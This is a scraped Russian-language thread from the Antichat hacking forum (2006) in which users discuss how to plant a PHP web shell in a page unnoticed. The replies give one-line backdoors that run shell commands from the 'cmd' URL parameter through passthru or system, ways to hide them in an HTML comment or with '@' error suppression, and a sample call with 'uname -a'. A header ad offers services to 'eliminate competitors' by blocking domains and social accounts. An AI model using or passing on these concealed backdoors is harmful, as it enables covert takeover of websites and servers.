Форум АНТИЧАТ - Как незаметно вставить уязвимый код в страницу?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Как незаметно вставить уязвимый код в страницу?

Опции темы

Поиск в этой теме

Опции просмотра

Как незаметно вставить уязвимый код в страницу?

01.07.2006, 01:11

mixas

Новичок

Регистрация: 15.01.2006

Сообщений: 10

Провел на форуме:
9353

Репутация: 0

Как незаметно вставить уязвимый код в страницу?

Требуется вставить код типа

Код:

<?passthru($_GET['cmd']);?>

Только чтобы на странице не высвечивалось сообщение о пустой команде.
Подскажите как лучше реализовать, можно ли например чтобы сообщение появлялось цветом фона.

01.07.2006, 01:20

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

Провел на форуме:
5887054

Репутация: 1292

А что насчёт

PHP код:


		
			
<!--<?passthru($_GET['cmd'])?>-->

01.07.2006, 01:32

mixas

Новичок

Регистрация: 15.01.2006

Сообщений: 10

Провел на форуме:
9353

Репутация: 0

Не хочет выполнять команды.

01.07.2006, 01:33

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

Провел на форуме:
5887054

Репутация: 1292

А ты в сорцах смотрел?

01.07.2006, 01:56

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

как ты используешь ее?
вставляешь, например, в index.php <?passthru($_GET['cmd']);?>. потом пиши http://yopta.tvoy/index.php?cmd=uname -a и все должно работать..

hidden  зачем брать в комменты?

__________________
ПИУ-ПИУ...

01.07.2006, 02:03

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

Провел на форуме:
5887054

Репутация: 1292

Он сказал, что у него на странице выдаётся сообщение о пустой команде, я сделал чтоб, результат был только в сорцах.

01.07.2006, 02:34

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

Вобще-то молодые люди, существует символ @ чтоб в браузер не выводилось никаких ошибок..... например
@system($_GET['cmd']); вот и всё!!!

Куда проще то?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Посимвольный перебор в базах данных на примере MySQL	LoFFi	Чужие Статьи	5	30.04.2007 05:05
На PHP, как на "Новые ворота"...	Mertvii-Listopad	Чужие Статьи	7	18.09.2006 12:42
Как вставить цветной текст в html страницу	Trinux	Болталка	5	13.05.2006 18:04
Как распознать код подтверждения при флуде?	Macroeject	Форумы	10	06.04.2006 10:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход